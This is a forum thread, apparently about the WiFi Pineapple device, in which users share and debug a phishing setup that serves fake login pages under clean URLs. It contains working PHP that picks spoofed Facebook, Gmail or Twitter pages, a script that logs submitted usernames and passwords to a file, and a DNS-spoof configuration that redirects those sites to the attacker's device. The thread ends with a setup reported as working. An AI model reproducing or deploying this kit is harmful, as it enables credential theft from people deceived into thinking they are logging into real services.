Phishing Without Folder Names

[PineDominator]

Just like what I did with my random roll php version 2 I thought I would start a post to get clean links for phishing.

Clean links IE example.com and not example.com/phish/example.html

change /www/index.php to

<?php

$ref = $_SERVER['HTTP_REFERER'];
$phishFolder = "phish/"; # Folder where your phishing files exist, Sym link from usb thumb drive "ln -s /usb/phishing-folder /www/phish"

$skipInclude = 0;

if (strpos($ref, "facebook")){
$phishFile = "facebook.html";
} elseif (strpos($ref, "gmail")) {
$phishFile = "gmail.html";
} elseif (strpos($ref, "twitter")) {
$phishFile = "twitter.html";
} else {
require('error.php');
$skipInclude = 1;
}

if ($skipInclude == 0) {
include($phishFolder.$phishFile);
}

?>
[/CODE]

then add your phish pages to your thumb drive to say /usb/phish/

you can sym link to the /www/ folder

[CODE]
ln -s /usb/phish /www/phish
[/CODE]

now I am expecting your phishing setup to look like this

/usb/phish/example.html

and the source files could go into a folder like

/usb/phish/example/

however you want to manage them

last thing to do is edit all the .html files so that any links to the source folder include the phish/ folder IE "/phish/example/banner.jpg"

what do you guys think? is this how phishing should be done from now on?

Edited July 27, 2012 by petertfm

[Neworld]

You don't have to do usb/.... you can create a symbolic ling in the /www/ folder. Here's a guy that made a video on it. Either way works though...

[PineDominator]

You don't have to do usb/.... you can create a symbolic ling in the /www/ folder. Here's a guy that made a video on it. Either way works though...

you could just put it in /www/phish/ but that would fill the little bit of memory the mk4 has and using the usb is a good standard.

I did explain how to sym link;-)

ln -s /usb/phish /www/phish
[/CODE]

[loozr]

Hi there! First of all thank you so much for sharing all your work! It's much appreciated!

However I seem to have some problems making this work. I'ts probably just me beeing stupid.. My phish files should be okay, at least they work nice whith "the original method".

My problem is that with this method without folder names my phishfiles just won't work. All that happens when i try to open i.e. facebook is that the page either does nothing, or goes back to the previous page. The code of the page is then showing up as:

<html><head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}
</script>
</head>
<body onload="goBack()">
</body></html>
[/CODE]

Which actually seems to be the last part of my error.php. I just don't understand why the browser would go directly to error.php, before the phishingpage..

My error.php

[CODE]
<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
$nam = stripslashes($_POST['name']);
$pas = stripslashes($_POST['pass']);
$nam = htmlspecialchars($nam, ENT_QUOTES);
$pas = htmlspecialchars($pas, ENT_QUOTES);
$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;
$filed = @fopen("pineapple/logs/phish.log", "a+");
@fwrite($filed, "$content\n");
@fclose($filed);
}
?>
<html><head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}
</script>
</head>
<body onload="goBack()">
</body></html>
[/CODE]

So my index.php looks like this.

[CODE]
<?php
$ref = $_SERVER['HTTP_REFERER'];
$phishFolder = "./"; # Folder where your phishing files exist, Sym link from usb thumb drive "ln -s /usb/phishing-folder /www/phish"
$skipInclude = 0;
if (strpos($ref, "facebook")){
$phishFile = "facebook.htm";
} elseif (strpos($ref, "gmail")) {
$phishFile = "gmail.html";
} elseif (strpos($ref, "twitter")) {
$phishFile = "twitter.htm";
} else {
require('error.php');
$skipInclude = 1;
}
if ($skipInclude == 0) {
include($phishFolder.$phishFile);
}
?>
[/CODE]

I have symlinked /usb/phish/* to /www/ thats why I have "./" as phishfolder. And I don't yet have anything for gmail, but facebook and twitter should still work. I think like this I would not have to edit all the links for facebook_files folder, right?

ls -l /www

[CODE]
root@Pineapple:~# ls -l /www
lrwxrwxrwx 1 root root 30 Aug 9 11:32 accounts.google.htm -> /usb/phish/accounts.google.htm
lrwxrwxrwx 1 root root 32 Aug 9 11:32 accounts.google_files -> /usb/phish/accounts.google_files
-rw-r--r-- 1 root root 621 Aug 9 10:32 error.php
lrwxrwxrwx 1 root root 23 Aug 9 11:21 facebook.htm -> /usb/phish/facebook.htm
lrwxrwxrwx 1 root root 25 Aug 9 11:21 facebook_files -> /usb/phish/facebook_files
-rw-r--r-- 1 root root 496 Aug 9 14:16 index.php
-rw-r--r-- 1 root root 113 Jun 5 18:42 indexORG.php
lrwxrwxrwx 1 root root 23 Aug 9 12:11 matchcom.htm -> /usb/phish/matchcom.htm
drwxr-xr-x 1 root root 0 Jul 2 01:28 pineapple
-rw-r--r-- 1 root root 490 Aug 9 12:41 redirect.php
lrwxrwxrwx 1 root root 22 Aug 9 11:32 twitter.htm -> /usb/phish/twitter.htm
lrwxrwxrwx 1 root root 24 Aug 9 11:32 twitter_files -> /usb/phish/twitter_files
[/CODE]

And my DNS spoof config states:

[CODE]
172.16.42.1 facebook.com
172.16.42.1 www.facebook.com
172.16.42.1 match.com
172.16.42.1 accounts.google.com
172.16.42.1 twitter.com
[/CODE]

Oh, and my redirect.php

[CODE]
<?php
$ref = $_SERVER['HTTP_REFERER'];
if (strpos($ref, "facebook")){ header('Location: facebook.htm'); }
if (strpos($ref, "match")){ header('Location: matchcom.htm'); }
if (strpos($ref, "accounts.google")){ header('Location: accounts.google.htm'); }
if (strpos($ref, "gmail")){ header('Location: accounts.google.htm'); }
if (strpos($ref, "twitter")){ header('Location: twitter.htm'); }
require('error.php');
?>
[/CODE]

Any help will be appreciated! :)

[PineDominator]

a lot a data:-D

question when you said you sym linked the phish folder what does it look like in /www/?

I see in the index.php you put "./" that would be an error, if the phish files are directly in /www/ then this shoul be empty ie ""

I hope this helps

ps I did not try out my own code and there could be errors or bugs.

[loozr]

Thanks for you reply! And I'm sorry about the amount of data that i pasted, just wasn't sure about what you needed to know.

Actually I pasted the ls of the /www folder right after my index.php in my previous post.

Just to clarify my facebook files looks like this

/www/facebook.htm

/www/facebook_files/

The thing is, I have tried to put both "./" and nothing ie "" but in any case I'm just seeing an empty page, whith the code as mentioned in my previous post.

But if i try to enter direct url i.e. 172.16.42.1/facebook.htm then the facebook page appears as it should, and phishing works as intended.

I just can't seem to understand what I did wrong.

[loozr]

Actually it seem I got it working when i changed the start of the index.php. as Neworld suggested in another thread.

I also changed the line that require error.php, into redirect.php. Aand in my case I have all the phish files symlinked directly to /www/ so I have edited out the $phishFolder since I didn't need it.

Pasting the complete working index.php

<?php
$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$skipInclude = 0;
if (strpos($ref, "facebook")) { $phishFile = "facebook.htm";
} elseif (strpos($ref, "gmail"))  { $phishFile = "gmail.htm";
} elseif (strpos($ref, "twitter")) { $phishFile = "twitter.htm";
} else { require('redirect.php');
$skipInclude = 1;
}
if ($skipInclude == 0) {
include($phishFile);
}
?>
[/CODE]

And so far it seems to be working like a charm! :)

Edited August 10, 2012 by loozr